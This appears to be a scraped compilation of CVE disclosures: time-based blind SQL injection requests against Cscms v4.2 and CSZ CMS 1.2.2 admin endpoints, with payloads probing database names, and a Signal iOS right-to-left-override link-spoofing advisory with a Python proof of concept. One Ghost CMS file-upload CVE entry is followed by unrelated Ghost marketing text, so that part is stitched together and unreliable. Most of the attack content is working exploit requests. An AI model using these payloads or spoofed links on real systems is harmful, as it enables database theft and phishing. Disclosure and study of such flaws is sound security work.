Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Lists.php_zhuan.

    POST /admin.php/dance/admin/lists/zhuan HTTP/1.1
    Host: cscms.test
    Content-Length: 23
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/lists?v=7131
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n9lv1ptm53932qcefgtfamknehtiv096;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))&cid=5
    

`(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)`

Because the first letter of the background database name is "c", it sleeps for 5 seconds

CVE-2022-27368: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #15 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Topic.php_del.

**There is a SQL blind injection vulnerability in dance\_Topic.php\_del****Details**

After the administrator is logged in, you need to add a song album

![image](https://user-images.githubusercontent.com/96719328/158503082-c3569a79-6b79-45d1-aeaf-5c6cd0d5bb47.png)

    POST /admin.php/dance/admin/topic/save HTTP/1.1
    Host: cscms.test
    Content-Length: 240
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    cid=0&tid=0&yid=0&color=&addtime=ok&name=1&pic=&tags=&fxgs=&yuyan=%E5%9B%BD%E8%AF%AD&diqu=%E5%A4%A7%E9%99%86&year=2022&user=&singer=&skins=topic-show.html&hits=0&yhits=0&zhits=0&rhits=0&shits=0&neir=&file=&title=&keywords=&description=&id=0
    

![image](https://user-images.githubusercontent.com/96719328/158503152-17fb9fba-1b55-4e8d-a2cf-e01efd11f401.png)

When deleting a song album, malicious statements can be constructed to achieve sql injection

![image](https://user-images.githubusercontent.com/96719328/158503192-0dcc9d08-41ae-4705-9de6-b72418ae0129.png)

    POST /admin.php/dance/admin/topic/del HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    id=3)and(sleep(5))--+
    

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158503234-312aa3f5-5fe1-4f0c-99f5-93f4c98cc6c6.png)

contrust payload

    POST /admin.php/dance/admin/topic/del HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    id=3)and(if(substr((select+database()),1,1)='c'sleep(5))--+
    

![image](https://user-images.githubusercontent.com/96719328/158503304-240ee76b-708f-4393-ab13-a2ad4a0d8478.png)

![image](https://user-images.githubusercontent.com/96719328/158503427-84ef4372-0fa8-45f7-b01f-a9d50df7d686.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code

![image](https://user-images.githubusercontent.com/96719328/158503481-46e35f70-11ee-4206-b51a-10a3ad1357f4.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27367: SQL injection vulnerability exists in Cscms music portal system v4.2(dance_Topic.php_del) · Issue #14 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Dance.php_del.

**SQL injection vulnerability exists in Cscms music portal system v4.2**

There is a SQL blind injection vulnerability in dance\_Dance.php\_del

**Details**

Add a song after administrator login  
![image](https://user-images.githubusercontent.com/96719328/158499410-c2be7972-449a-4534-b767-c01d6b108373.png)  
POC

    POST /admin.php/dance/admin/dance/save HTTP/1.1
    Host: cscms.test
    Content-Length: 292
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/dance/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_session=vh1bscpjrcvfiil1mcr4qhgo9ri1dck8; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA
    Connection: close
    
    cid=1&addtime=ok&name=1&color=&pic=&user=&cion=0&purl=&durl=&reco=0&tid=0&fid=0&zc=&zq=&bq=&hy=&singer=&dx=&yz=&sc=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&shits=0&xhits=0&vip=0&level=0&wpurl=&wppass=&skins=play.html&gc=0&text=&file=&lrc=&title=&keywords=&description=&id=0&sid=0
    

![image](https://user-images.githubusercontent.com/96719328/158499490-a9851157-3ebc-4535-992a-06086a6d06f5.png)

When deleting songs in the recycle bin, construct malicious statements and implement sql injection

    POST /admin.php/dance/admin/dance/del?yid=3 HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=kpqu73c98lvqmbbkebu36pbd3pferpdb
    Connection: close
    
    id=7)and(sleep(5))--+
    

![image](https://user-images.githubusercontent.com/96719328/158499667-567c12f1-99ea-4bef-91a0-c0afeb93a4d2.png)

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158499784-ff7a6921-f1a0-4a60-97b3-a9b5cd4ae202.png)

![image](https://user-images.githubusercontent.com/96719328/158499809-e7e71538-9381-4e31-aecb-e5fd6701b7ad.png)

![image](https://user-images.githubusercontent.com/96719328/158499898-d5a1570a-4735-4074-86eb-760c08c6406a.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code

![image](https://user-images.githubusercontent.com/96719328/158499941-b34c8fbd-bd70-409c-a874-04abbb2f0ec9.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27365: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #12 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the component dance_Dance.php_hy.

**There is a SQL blind injection vulnerability in dance\_Dance.php\_hy****Details**

Add a song after administrator login  
![image](https://user-images.githubusercontent.com/96719328/158500746-50c27c84-05ac-4d5b-b206-695c60f63e51.png)

Add songs first and then delete them into the trash

![image](https://user-images.githubusercontent.com/96719328/158500808-df6007b2-2032-4aa0-96f1-b230c5dd15f8.png)

![image](https://user-images.githubusercontent.com/96719328/158500843-0a8fb76e-2255-42a9-8088-373d58c33c2d.png)

When restoring songs in the recycle bin, construct malicious statements and implement sql injection

![image](https://user-images.githubusercontent.com/96719328/158500952-abbb9bc3-b741-47e2-9874-006edcabbc9f.png)

    GET /admin.php/dance/admin/dance/hy?id=10)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6
    Connection: close
    

The parameter "id" exists time blind, sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158501001-7b2a3508-5f84-4a52-af2c-8121237c8433.png)

construct payload

    GET /admin.php/dance/admin/dance/hy?id=10)and(if(substr((select+database()),1,1)='c',sleep(5),1)--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6
    Connection: close
    
    

In the figure below, you can see that the first letter of the database is "c", so it sleeps for 5 seconds to verify that the injection exists

![image](https://user-images.githubusercontent.com/96719328/158501196-0862a524-881b-4c3f-814d-1645a92e7fa3.png)

![image](https://user-images.githubusercontent.com/96719328/158501168-cccab3c8-b7b4-45e6-aa48-5e661f1795bd.png)

CVE-2022-27366: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #13 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component news_News.php_hy.

**There is a SQL blind injection vulnerability in news\_News.php\_hy****Details**

After the administrator is logged in, a news needs to be added

![image](https://user-images.githubusercontent.com/96719328/158506380-f537906e-5519-4a24-822f-1a21bfc8fdd5.png)

    POST /admin.php/news/admin/news/save HTTP/1.1
    Host: cscms.test
    Content-Length: 204
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/news/admin/news/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=5apla1fdentnsdis6lbq25n548poo682
    Connection: close
    
    cid=1&tid=0&reco=1&color=&name=1&addtime=ok&info=1&pic=&pic2=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&user=&cion=0&vip=0&level=0&skins=&content=&file=&title=&keywords=&description=&id=0&yid=0
    

![image](https://user-images.githubusercontent.com/96719328/158506454-ac41f81b-55f9-446e-83c8-370f13ddf6cd.png)

delete this article to trash

![image](https://user-images.githubusercontent.com/96719328/158506605-052ebc0a-1e3c-4ace-95a5-dc01f56c80ab.png)

When restoring articles in the recycle bin, construct malicious statements and implement sql injection

![image](https://user-images.githubusercontent.com/96719328/158507281-5c2d57d4-0cda-4883-a3f7-27f06f46579b.png)

    GET /admin.php/news/admin/news/hy?id=5)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/news/admin/news?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=7qpsm1cblear8tgkbflk5mdl7qa7k23f
    Connection: close
    

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158507341-3c9ca5e8-ba6e-4a91-8bc5-5f3d189301c6.png)

![image](https://user-images.githubusercontent.com/96719328/158507430-e4febc1c-b33d-4438-8508-596db0888ace.png)

![image](https://user-images.githubusercontent.com/96719328/158507454-dd256638-00df-4b86-8c3b-ac044267a311.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code  
\\News::hy

![image](https://user-images.githubusercontent.com/96719328/158507501-c6516d6f-0c77-40b5-8877-d8c756f54180.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27369: SQL injection vulnerability exists in Cscms music portal system v4.2(news_News.php_hy) · Issue #16 · chshcms/cscms

The Signal app before 5.34 for iOS allows URI spoofing via RTLO injection. It incorrectly renders RTLO encoded URLs beginning with a non-breaking space, when there is a hash character in the URL. This technique allows a remote unauthenticated attacker to send legitimate looking links, appearing to be any website URL, by abusing the non-http/non-https automatic rendering of URLs. An attacker can spoof, for example, example.com, and masquerade any URL with a malicious destination. An attacker requires a subdomain such as gepj, txt, fdp, or xcod, which would appear backwards as jpeg, txt, pdf, and docx respectively.

**Title**

CVE-2022-28345 - Signal client for iOS version 5.33.2 and below are vulnerable to RTLO Injection URI Spoofing using malicious URLs such as gepj.net/selif#/moc.elpmaxe which would appear as example.com/#files/ten.jpeg

**CVE ID**

CVE-2022-28345

**CVSS Score**

N/A

**Internal IDs**

SICK-2022-42

**Vendor**

Signal

**Product**

Signal iOS Client

**Product Versions**

5.33.2 and below

**Vulnerability Details**

An additional RTLO Injection URI Spoofing in the Signal client for iOS version 5.33.2 and below incorrectly renders RTLO encoded URLs beginning with a non-breaking space, and a hash character in the URL. This technique allowing a remote unauthenticated attacker to send 100% authentic looking links, appearing as any website URL by abusing the non-http & non-https automatic rendering of URLs on the iOS client application for top level domains. An attacker can spoof, for example, example.com, and masquerade any URL with a malicious destination. An attacker only requires a subdomain such as: gepj, txt, fdp, or xcod, which would appear as jpeg, txt, pdf, and docx respectively. This only affects iOS but can be sent via any other client.

**Vendor Response**

Fixed in Signal iOS client 5.34 released around April 7-8th 2022 depending on your App Store.

Patch: https://github.com/signalapp/Signal-iOS/commit/b0721e601e549996154127225c68769dfbfae506

**Proof of Concept**

Send a message to someone, using natural looking domains, such as apple.com, imgur.com, dhl.com, etc.

`gepj.net/selif#/moc.rugmi`

Will appear as

`imgur.com/#files/ten.jpeg`

The use of the `#` character, and removal of `http`/`https` causes the Signal client to hyperlink the entire URL and bypasses previous related CVE's.

#!/usr/bin/env python
\# Modified:     sickcodes
\# Authors:      zadewg
\# Repo:         https://github.com/zadewg/RIUS
\# Contact:      https://github.com/zadewg/RIUS, https://github.com/sickcodes
\# Copyright:    zadewg (C) 2019, sickcodes (C) 2021
\# Modified:     https://github.com/zadewg/RIUS
\# License:      MIT

import sys

\_LEGWEB \= 'imgur.com'

\_ATTWEB \= 'gepj.net'

\_SUBDIR \= 'images'

\_RTLO \= (u'\\u202e')

\_LEGWEB \= \_LEGWEB\[::\-1\]
\_SUBDIR \= \_SUBDIR\[::\-1\]

print(\_LEGWEB+'/'+\_SUBDIR)

\_ATTFULL \= \_LEGWEB+'/'+\_SUBDIR

print(\_ATTFULL)

sys.stdout.write(' ' + \_RTLO + (\_ATTWEB + '/' + \_SUBDIR + '#/' + \_LEGWEB) +'\\n')

This is due to the following RTLO character, and the abuse of trusted TLD domains:

`<0x202e>gepj.net/segami#/moc.rugmi`

**Disclosure Timeline**

*   **2019-03-24** - Original research uncovered in related apps
*   **2022-03-24** - Researchers meet each other
*   **2022-03-24** - Additional bypass discovered
*   **2022-03-24** - Signal notified
*   **2022-04-02** - CVE Requested
*   **2022-04-02** - CVE Assigned CVE-2022-28345
*   **2022-04-04** - Vendor advised of CVE & sent the bypass PoC
*   **2022-04-06** - Researcher confirms fix in 5.34
*   **2022-04-07** - App Stores publish 5.34
*   **2022-04-14** - Researcher publishes CVE, PoC, Video

**Links**

https://sick.codes/sick-2022-42

https://github.com/sickcodes/security/blob/master/advisories/SICK-2022-42.md

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28345

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28345

https://github.com/zadewg/RIUS

https://blog.malwarebytes.com/social-engineering/2022/03/uri-spoofing-flaw-could-phish-whatsapp-signal-instagram-and-imessage-users/

**Researchers**

zadewg: https://github.com/zadewg

Sick Codes: https://github.com/sickcodes || https://twitter.com/sickcodes

CVE-2022-28345: security/SICK-2022-42.md at master · sickcodes/security

An arbitrary file upload vulnerability in the file upload module of Ghost CMS v4.42.0 allows attackers to execute arbitrary code via a crafted file.

![The Browser](https://ghost.org/images/customers/thebrowser.jpg)

Turn your audience into a business

**Ghost gives creators tools to launch their own subscription business.**

Memberships, subscriptions, and email newsletters, all in one place. Some of the most popular editorial newsletters in the world run on Ghost, including The Browser, with its **10,000+** paying subscribers.

Ghost is a complete platform to run an independent media business, whether you're just getting started as a creator, or scaling to millions of dollars a year in recurring revenue.

Subscription business models have been incredibly successful in software, music and video streaming over the last few years. Now, anyone can launch their own subscription commerce service, and make a living from their creative work.

![The Browser logo](https://ghost.org/images/customers/thebrowser_logo_hub7f1f059f82ec3b2cd82ecfcbfc3dd82_16082_400x0_resize_q100_h2_box_3.webp)

![Buffer theme](https://ghost.org/images/customers/buffer.jpg)

Who uses Ghost?

**A powerful publishing platform, trusted by the world's leading writers, creators, and professional content teams.**

Ghost is used by teams who want full control of their content workflow, and are tired of fighting broken software. A clean editor, optimised publishing flow, native email newsletters, and total control of design are the biggest reasons for why teams trade in their old platform for Ghost.

Setting up a basic blog is easy, but if you're creating content for work, and you need a reliable platform to build a business around, Ghost is the leading choice for professional online publishing.

Many of the world's best content marketing teams, like **Buffer**, use Ghost to publish.

![Buffer logo](https://ghost.org/images/customers/buffer_logo_hu7bd072387c43f72fd2287d56486d6823_13632_400x0_resize_q100_h2_box_3.webp)

![OpenAI theme](https://ghost.org/images/customers/openai.jpg)

Why choose Ghost?

**Privacy, security and speed are some of the most common reasons for why large companies and publications favour Ghost for their publishing needs.**

We've found that most modern teams setting up new publications get given the same brief: Use an open platform which is stable, make sure it's fast + SEO friendly, and make absolutely certain it's not PHP. Ghost has quickly become the most popular platform to check all those boxes.

Enjoy a standard of technology which you normally only get building in-house: A **Node.js** core + a full **JSON API** with a permissive **MIT License**, all of which have received extensive independent security audits and penetration testing.

Ghost's advantages attracted Elon Musk's **OpenAI** team to publish all of their research using Ghost.

![OpenAI logo](https://ghost.org/images/customers/openai_logo_hu86d0967c44bea60c7f330757e8cdddef_3444_360x0_resize_q100_h2_box_3.webp)

![The Stanford Review theme](https://ghost.org/images/customers/stanfordreview.jpg)

But what about Medium?

**Medium is a great social network to use for promotion, while Ghost allows you to build out your own platform and your own audience.**

When you're building a publication you should always use social networks like Twitter, Facebook and Medium to promote your content & find new readers. But once you've got those readers: What next? Social networks give you zero control over your audience, and if they decide to change algorithms or disappear, then so does your readership.

**You can loosely think of it like this:** Social networks are like running ads or guest spot in somebody else's magazine. By contrast, using Ghost is like creating your own magazine and owning the full, custom experience from cover to cover.

Multiple people on **The Stanford Review** team publish on Medium, but the newspaper has smartly built out its core publication on top of Ghost.

![The Stanford Review logo](https://ghost.org/images/customers/stanfordreview_logo_huf4cbbc71030e6f3be049fc654f733540_10681_400x0_resize_q100_h2_box_3.webp)

![Mozilla](https://ghost.org/images/customers/mozilla.jpg)

What's the best way to run Ghost?

**Ghost can either be run on our fully managed hosting, or directly integrated into your own infrastructure depending on what you prefer.**

The majority of people tend to run Ghost on our fully managed PaaS called **Ghost(Pro)**. This removes the headaches of server management, security monitoring and software updates completely — and allows you to focus on the other aspects of your business where time is better spent.

Some larger organisations such as **Apple** and **Mozilla** choose to run Ghost on their own private networks where they're able to make some deep core modifications to the software in order suit specific use cases.

For these types of companies we're always pleased to offer **Enterprise Cloud** contracts to ensure that their software is always secure, up to date, and running optimally.

![Mozilla logo](https://ghost.org/images/customers/mozilla_logo_hu976b6a221e9fe502ecd0f498c1887503_23119_400x0_resize_q100_h2_box_3.webp)

![Speedtest theme](https://ghost.org/images/customers/speedtest.jpg)

Can I modify it for my needs?

**Ghost has a very simple admin UI for a smooth user experience, but under the hood you still have full control over how it works.**

Things like automatic **XML sitemaps**, **RSS feeds** and dedicated **SEO & Structure Data** meta fields mean that there's a lot which Ghost just does for you, right out of the proverbial box. But it can also be adapted to suit a huge number of use cases.

Front end modifications for things like analytics, styling and scripts are easily done at a theme level. You can plug in multiple database via an ORM layer, while your file system can live almost anywhere using a custom storage adapter. Even integrating a full search index using something like **Algolia** is possible with a few tweaks.

Our friends over at **Speedtest.net** even run a modified base URL setup to serve their site on `speedtest.net/insights` rather than `insights.speedtest.net`.

![Speedtest logo](https://ghost.org/images/customers/speedtest_logo_huafd33ecc61f058273c3105e415797f25_3481_400x0_resize_q100_h2_box_3.webp)

![Fullstory theme](https://ghost.org/images/customers/fullstory.jpg)

What about design?

**Create a custom design from scratch, choose a pre-made template, or modify our default theme to suit your style and brand.**

Our **theme API** gives you full control over the look and feel of your publication, with a strong focus on both flexibility and performance. You can build a theme completely from scratch, or you can select one of the many pre-made templates available in our **theme marketplace**.

A fast-track to getting a new publication online is to use the Ghost default theme as a base and modify it to suit your brand. This allows you to get up and running with minimal fuss, benefitting from hundreds of hours of development already done for you. If that's not for you, you can always start from ground zero and create a stunning custom publication like **FullStory** did.

Whatever you decide, you're in the driver's seat.

![Fullstory logo](https://ghost.org/images/customers/fullstory_logo_hu8354d8351eba2e106b2a62f478e12da2_1771_241x0_resize_q100_h2_box_3.webp)

**Ready to give it a try?** Start a trial completely free for 14 days and build your publication

CVE-2022-28397: Ghost Customers – A showcase of real sites built with Ghost

Csz Cms 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Members_viewUsers

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Members/viewUsers/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=bkmcrultec13pmpnos5mb208vtnbophc; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=3f9bce14914ec5f9957c9737702e7d49;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23  
cszcms-1.2.2/cszcms/controllers/admin/Members.php::viewUsers  
![image](https://user-images.githubusercontent.com/101378989/157823627-d95048e4-311e-426d-bb4d-b26f5329160a.png)

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27161: SQL Injection vulnerability on cszcms_admin_Members_viewUsers · Issue #43 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Members_editUser

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Members/editUser/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: 127_0_01_cszsess=bkmcrultec13pmpnos5mb208vtnbophc; cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=d5df85a9d7e7227524a43e3f510a3ac1;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

CVE-2022-27162: SQL Injection vulnerability  on cszcms_admin_Members_editUser · Issue #44 · cskaza/cszcms

CSZ CMS 1.2.2 is vulnerable to SQL Injection via cszcms_admin_Users_editUser

Description:  
SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases.

    GET /index.php/admin/Users/editUser/%27%6f%72%28%73%6c%65%65%70%28%35%29%29%23 HTTP/1.1
    Host: 127.0.0.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/index.php/member/login/check
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cszcookie_95afc46801137b6f60a97c469742e6aacsrf_cookie_csz=ac52710dd12b2ae2241aaf6c83f68415; 127_0_01_cszsess=dt2ll8telivrlubjmmkh34ppo976eqea;XDEBUG_SESSION=PHPSTORM
    Connection: close
    

payload: 'or(sleep(5))#  
URL-encode all characters  
payload: %27%6f%72%28%73%6c%65%65%70%28%35%29%29%23

Impact: Read and modify the users database  
Mitigation: Use of Parameterized SQL Queries and Validation

Tag

#apple